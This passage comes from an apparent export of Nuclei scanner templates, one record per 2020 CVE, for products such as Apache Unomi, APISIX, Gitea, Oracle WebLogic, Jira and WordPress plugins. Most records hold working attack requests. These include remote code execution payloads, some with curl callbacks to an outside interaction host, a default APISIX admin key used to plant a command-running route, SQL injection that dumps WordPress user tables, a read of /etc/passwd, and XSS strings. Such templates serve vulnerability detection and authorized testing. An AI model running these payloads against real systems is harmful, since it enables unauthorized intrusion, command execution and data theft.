critical\n description: |\n Airflow's Experimental API prior 1.10.11 allows all API requests without authentication.\n impact: |\n Allows unauthorized access to Airflow Experimental REST API\n remediation: |\n From Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references.\n reference:\n - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E\n - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html\n - https://airflow.apache.org/docs/1.10.11/security.html#api-authenticatio\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13927\n - http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13927\n cwe-id: CWE-1188\n epss-score: 0.96246\n epss-percentile: 0.99489\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: airflow\n shodan-query: title:\"Airflow - DAGs\" || http.html:\"Apache Airflow\"\n tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/experimental/latest_runs'\n\n matchers:\n - type: word\n part: body\n words:\n - '\"dag_run_url\":'\n - '\"dag_id\":'\n - '\"items\":'\n condition: and\n# digest: 490a00463044022039773e3df5e30a54dfb047b567020f8006e6597a61396e83cb36083fa06404a602203435f7eb2403447cd3c27da2a7077ecde3b5ea1c3a9079a9574e26a7831f06b8:922c64590222798bb761d5b6d8e72950", "hash": "107f4cb6dfb3c94dd9ad92925693a19b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818b" }, "name": 
"CVE-2020-13937.yaml", "content": "id: CVE-2020-13937\n\ninfo:\n name: Apache Kylin - Exposed Configuration File\n author: pikpikcu\n severity: medium\n description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.\n impact: |\n An attacker can gain sensitive information from the exposed configuration file, potentially leading to further attacks.\n remediation: |\n Secure the configuration file by restricting access permissions and implementing proper access controls.\n reference:\n - https://kylin.apache.org/docs/release_notes.html\n - https://s.tencent.com/research/bsafe/1156.html\n - https://lists.apache.org/thread.html/rc592e0dcee5a2615f1d9522af30ef1822c1f863d5e05e7da9d1e57f4%40%3Cuser.kylin.apache.org%3E\n - https://github.com/Al1ex/CVE-2020-13937\n - https://github.com/HimmelAward/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-13937\n cwe-id: CWE-922\n epss-score: 0.97421\n epss-percentile: 0.99929\n cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: kylin\n tags: cve,cve2020,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/kylin/api/admin/config\"\n\n headers:\n Content-Type: \"application/json\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: word\n part: body\n words:\n - config\n - kylin.metadata.url\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210092081ead1b869e9dda724782ee4de965bc0f0e116474ed366f8d370a14dbb07d02204a4b6cb67c83309c810d2b386aab64f87d5aa13bb183687f94890e463204b1a4:922c64590222798bb761d5b6d8e72950", "hash": "7afc077e133b15a8346fa0f86fa8bf2a", 
"level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818c" }, "name": "CVE-2020-13942.yaml", "content": "id: CVE-2020-13942\n\ninfo:\n name: Apache Unomi <1.5.2 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n Apache Unomi allows conditions to use OGNL and MVEL scripting which\n offers the possibility to call static Java classes from the JDK\n that could execute code with the permission level of the running Java process.\n This vulnerability affects all versions of Apache Unomi prior to 1.5.2.\n impact: |\n Successful exploitation of this vulnerability can allow an attacker to execute arbitrary code on the affected server.\n remediation: Apache Unomi users should upgrade to 1.5.2 or later.\n reference:\n - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/\n - https://twitter.com/chybeta/status/1328912309440311297\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13942\n - http://unomi.apache.org./security/cve-2020-13942.txt\n - https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13942\n cwe-id: CWE-74,CWE-20\n epss-score: 0.97256\n epss-percentile: 0.99818\n cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: unomi\n tags: cve,cve2020,apache,rce\nvariables:\n id: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/context.json\"\n\n body: |\n {\n \"filters\": [\n {\n \"id\": \"{{id}}\",\n \"filters\": [\n {\n \"condition\": {\n \"parameterValues\": {\n \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n },\n \"type\": \"profilePropertyCondition\"\n }\n }\n ]\n }\n ],\n \"sessionId\": \"nuclei\"\n }\n\n headers:\n Content-Type: \"application/json\"\n\n matchers-condition: and\n 
matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n - \"context-profile-id\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"(profile|session)(Id|Properties|Segments)\"\n - \"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205096ac7dee1e5786c667edd38a53a33296046edc498c114bd6a311c7245137cd02201175f746a924dd45e76b455251d1fd79904cf2bba02e3b238be06836d0acff08:922c64590222798bb761d5b6d8e72950", "hash": "975880914e24ca88a29bc8f1255c60e8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818d" }, "name": "CVE-2020-13945.yaml", "content": "id: CVE-2020-13945\n\ninfo:\n name: Apache APISIX - Insufficiently Protected Credentials\n author: pdteam\n severity: medium\n description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.\n impact: |\n The vulnerability could result in unauthorized access to sensitive information, leading to potential data breaches or unauthorized actions.\n remediation: |\n Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. 
Additionally, ensure that sensitive credentials are properly protected and stored securely.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945\n - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E\n - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13945\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-13945\n cwe-id: CWE-522\n epss-score: 0.00838\n epss-percentile: 0.81705\n cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: apisix\n tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix\n\nhttp:\n - raw:\n - |\n POST /apisix/admin/routes HTTP/1.1\n Host: {{Hostname}}\n X-API-KEY: edd1c9f034335f136f87ad84b625c8f1\n Content-Type: application/json\n\n {\n \"uri\":\"/{{randstr}}\",\n \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f = assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close() \\n end \\nreturn _M\",\n \"upstream\":{\n \"type\":\"roundrobin\",\n \"nodes\":{\n \"interact.sh:80\":1\n }\n }\n }\n - |\n GET /{{randstr}}?cmd=id HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"action\":\"create\"'\n - '\"script\":'\n - '\"node\":'\n condition: and\n\n - type: status\n status:\n - 201\n\n extractors:\n - type: regex\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n# digest: 4b0a00483046022100efbf11bb66cb565f79edd3f4a95a75ca6939ca6c573155b78208a326bae668400221009ed2eceab8a745e0240bfe7e993f27535e64fdb38bc0758e3f0b33fb42d75345:922c64590222798bb761d5b6d8e72950", "hash": "a2dab43dc49716fe8d60ecb2aa5ebdbb", "level": 
4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818e" }, "name": "CVE-2020-14092.yaml", "content": "id: CVE-2020-14092\n\ninfo:\n name: WordPress PayPal Pro <1.1.65 - SQL Injection\n author: princechaddha\n severity: critical\n description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/10287\n - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14092\n - https://wordpress.org/plugins/payment-form-for-paypal-pro/#developers\n - https://wpvulndb.com/vulnerabilities/10287\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-14092\n cwe-id: CWE-89\n epss-score: 0.66877\n epss-percentile: 0.97643\n cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ithemes\n product: paypal_pro\n framework: wordpress\n tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - '\"user_login\"'\n - '\"user_email\"'\n - '\"user_pass\"'\n - '\"user_activation_key\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
4a0a004730450220228a7ef9ce78fa7167394c98b977980223593a12a9e32003d6358a8d430fd731022100a4933847321f98d16080b14432d7315b1d3f1e97ca00bfe877d28bf9fae00765:922c64590222798bb761d5b6d8e72950", "hash": "6624b55634e0ae67490638651ab71533", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818f" }, "name": "CVE-2020-14144.yaml", "content": "id: CVE-2020-14144\n\ninfo:\n name: Gitea 1.1.0 - 1.12.5 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: |\n Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states \"This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. 
We provide very clear warnings to users around this functionality and what it provides.\"\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Fixed in version 1.16.7.\n reference:\n - https://dl.gitea.io/gitea/1.16.6\n - https://github.com/go-gitea/gitea/pull/13058\n - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14144\n - https://docs.github.com/en/enterprise-server@2.19/admin/policies/creating-a-pre-receive-hook-script\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2020-14144\n cwe-id: CWE-78\n epss-score: 0.97181\n epss-percentile: 0.99775\n cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 7\n vendor: gitea\n product: gitea\n shodan-query: html:\"Powered by Gitea Version\"\n tags: cve2020,cve,rce,gitea,authenticated,git,intrusive\n\nhttp:\n - raw:\n - |\n GET /user/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /user/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n - |\n GET /repo/create HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /repo/create HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n - |\n POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n - |\n GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\n Host: {{Hostname}}\n - 
|\n POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: body_1\n words:\n - \"Gitea:\"\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - name=\"_csrf\" value=\"(.*)\"\n internal: true\n\n - type: regex\n name: auth_csrf\n group: 1\n regex:\n - name=\"_csrf\" content=\"(.*)\"\n internal: true\n\n - type: regex\n name: last_commit\n group: 1\n regex:\n - name=\"last_commit\" value=\"(.*)\"\n internal: true\n# digest: 4a0a00473045022100e398d9d82ff8b9b88f71c78ed86a11cd12d18203426a0f2396f654d19d04022a0220753f0b26dc09689a5afbbb739a698e8340f6bb5296ac8e88f3fc93d75ab2cd3c:922c64590222798bb761d5b6d8e72950", "hash": "45870d0e6dcff9a0445c43ef9b5de47b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308190" }, "name": "CVE-2020-14179.yaml", "content": "id: CVE-2020-14179\n\ninfo:\n name: Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure\n author: x1m_martijn\n severity: medium\n description: Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. 
An attacker can view custom field names and custom SLA names.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Upgrade Atlassian Jira Server/Data Center to a version higher than 8.11.1 to mitigate the vulnerability.\n reference:\n - https://jira.atlassian.com/browse/JRASERVER-71536\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14179\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-14179\n epss-score: 0.00927\n epss-percentile: 0.81211\n cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: jira_data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2020,atlassian,jira,exposure,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/secure/QueryComponent!Default.jspa\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{\"searchers\":'\n - '\"groups\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210096f095a7e5b1890aec761ba02f30068376572d358c7b7f2377be52b71bafe88c02203feeb9b688c168e5c644f45bc6e2e4031cd7a2f541d50bf68d50e45bb9ebd6e4:922c64590222798bb761d5b6d8e72950", "hash": "6259d2916640ac64fe06d8e48b54045c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308191" }, "name": "CVE-2020-14181.yaml", "content": "id: CVE-2020-14181\n\ninfo:\n name: Jira Server and Data Center - Information Disclosure\n author: bjhulst\n severity: medium\n description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. 
Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.\n impact: |\n An attacker can gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.\n reference:\n - https://jira.atlassian.com/browse/JRASERVER-71560\n - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14181\n - https://github.com/H4ckTh3W0r1d/Goby_POC\n - https://github.com/Rival420/CVE-2020-14181\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-14181\n cwe-id: CWE-200\n epss-score: 0.95919\n epss-percentile: 0.99412\n cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2020,atlassian,jira,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/secure/ViewUserHover.jspa'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'user-hover-details'\n - 'content=\"JIRA\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204aa72378f1d38af3a56bbb872653fe90f1d82c08a7a5a4c2599987f2b07a3a9d022100ad34ea3f11b966b88af4d8f227f8e9b46f7032332c327e80e59e9cd963e2406e:922c64590222798bb761d5b6d8e72950", "hash": "0ff7dad1baa24ead9b0021070e663760", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308192" }, "name": "CVE-2020-14408.yaml", "content": "id: CVE-2020-14408\n\ninfo:\n name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of 
arbitrary JavaScript code into a web page's content.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/agentejo/cockpit/issues/1310\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14408\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n - https://github.com/anonymous364872/Rapier_Tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-14408\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.44682\n cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: agentejo\n product: cockpit\n tags: cve2020,cve,cockpit,agentejo,xss,oss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"redirectTo = '/92874';alert(document.domain)//280';\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d9c05fb3baf867f35afbb4c5ecbc371b317d9ad9a8ce6ccb6c7fdbc1f3231cf902207c1160d456c6b712685c5c2f9c8f5a2c8102f6d5ec75ce531f6daa39b39f4bd7:922c64590222798bb761d5b6d8e72950", "hash": "ee03f4db28a7119eff50800934b19e86", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308193" }, "name": "CVE-2020-14413.yaml", "content": "id: CVE-2020-14413\n\ninfo:\n name: NeDi 1.9C - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of 
sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14413\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-14413\n cwe-id: CWE-79\n epss-score: 0.00095\n epss-percentile: 0.38971\n cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nedi\n product: nedi\n tags: cve,cve2020,nedi,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a17974c94baa6f004137cf8899e0977bd37030e412c83a9d74273c6477095cfe022100ae2ba0fe9043f67069286b217dd44873f67f994fd877249b7dc65282d21d5c70:922c64590222798bb761d5b6d8e72950", "hash": "53af54574c3ff285a61b5f8a59f471a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308194" }, "name": "CVE-2020-14750.yaml", "content": "id: CVE-2020-14750\n\ninfo:\n name: Oracle WebLogic Server - Remote Command Execution\n author: princechaddha,DhiyaneshDk\n severity: critical\n 
description: |\n Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server.\n remediation: |\n Apply the latest security patches provided by Oracle to mitigate this vulnerability.\n reference:\n - https://github.com/pprietosanchez/CVE-2020-14750\n - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14750\n - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-14750\n epss-score: 0.97544\n epss-percentile: 0.99996\n cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: oracle\n product: fusion_middleware\n shodan-query: http.html:\"Weblogic Application Server\"\n tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n cmd: curl {{interactsh-url}}\n Content-Type: application/x-www-form-urlencoded\n\n _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\n weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\n java.lang.reflect.Field field = 
adapter.getClass().getDeclaredField(\"connectionHandler\");\n field.setAccessible(true);\n Object obj = field.get(adapter);\n weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\n String cmd = req.getHeader(\"cmd\");\n String[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\n if (cmd != null) {\n String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n res.getServletOutputStream().flush();\n res.getWriter().write(\"\");\n }executeThread.interrupt();\n \");\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: header\n words:\n - \"ADMINCONSOLESESSION=\"\n\n - type: regex\n part: body\n regex:\n - '(.*)'\n# digest: 4b0a0048304602210089aca28d5d41776ea96aa0bb6616121eee0ef6ec762a650669fc5f6e650aab49022100c700af3059d9fd95fe63ddec43493d48232678dc50bc266a2f8cfaa26d4fcc09:922c64590222798bb761d5b6d8e72950", "hash": "2f26b9395187b9295d6f77ded97259b2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308195" }, "name": "CVE-2020-14864.yaml", "content": "id: CVE-2020-14864\n\ninfo:\n name: Oracle Fusion - Directory Traversal/Local File Inclusion\n author: Ivo Palazzolo (@palaziv)\n severity: high\n description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via \"getPreviewImage.\"\n impact: |\n Successful exploitation 
of this vulnerability could allow an attacker to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.\n remediation: |\n Apply the latest security patches and updates provided by Oracle to fix this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html\n - https://www.oracle.com/security-alerts/cpuoct2020.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14864\n - https://github.com/merlinepedra/nuclei-templates\n - https://github.com/sobinge/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-14864\n cwe-id: CWE-22\n epss-score: 0.4541\n epss-percentile: 0.97318\n cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: business_intelligence\n tags: cve,cve2020,oracle,lfi,kev,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1'\n - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*:0:0:'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220301c1ccec08f0b8a2313e6ea62b0556adacd5dd33597547f10af2990730050940221009d500c9bbdf08a1cea7b841a5cbd8ffe901e3271ed97a3a489cd5ab76369ba6e:922c64590222798bb761d5b6d8e72950", "hash": "b652b0899deaed2ef808674ce677511f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308196" }, "name": 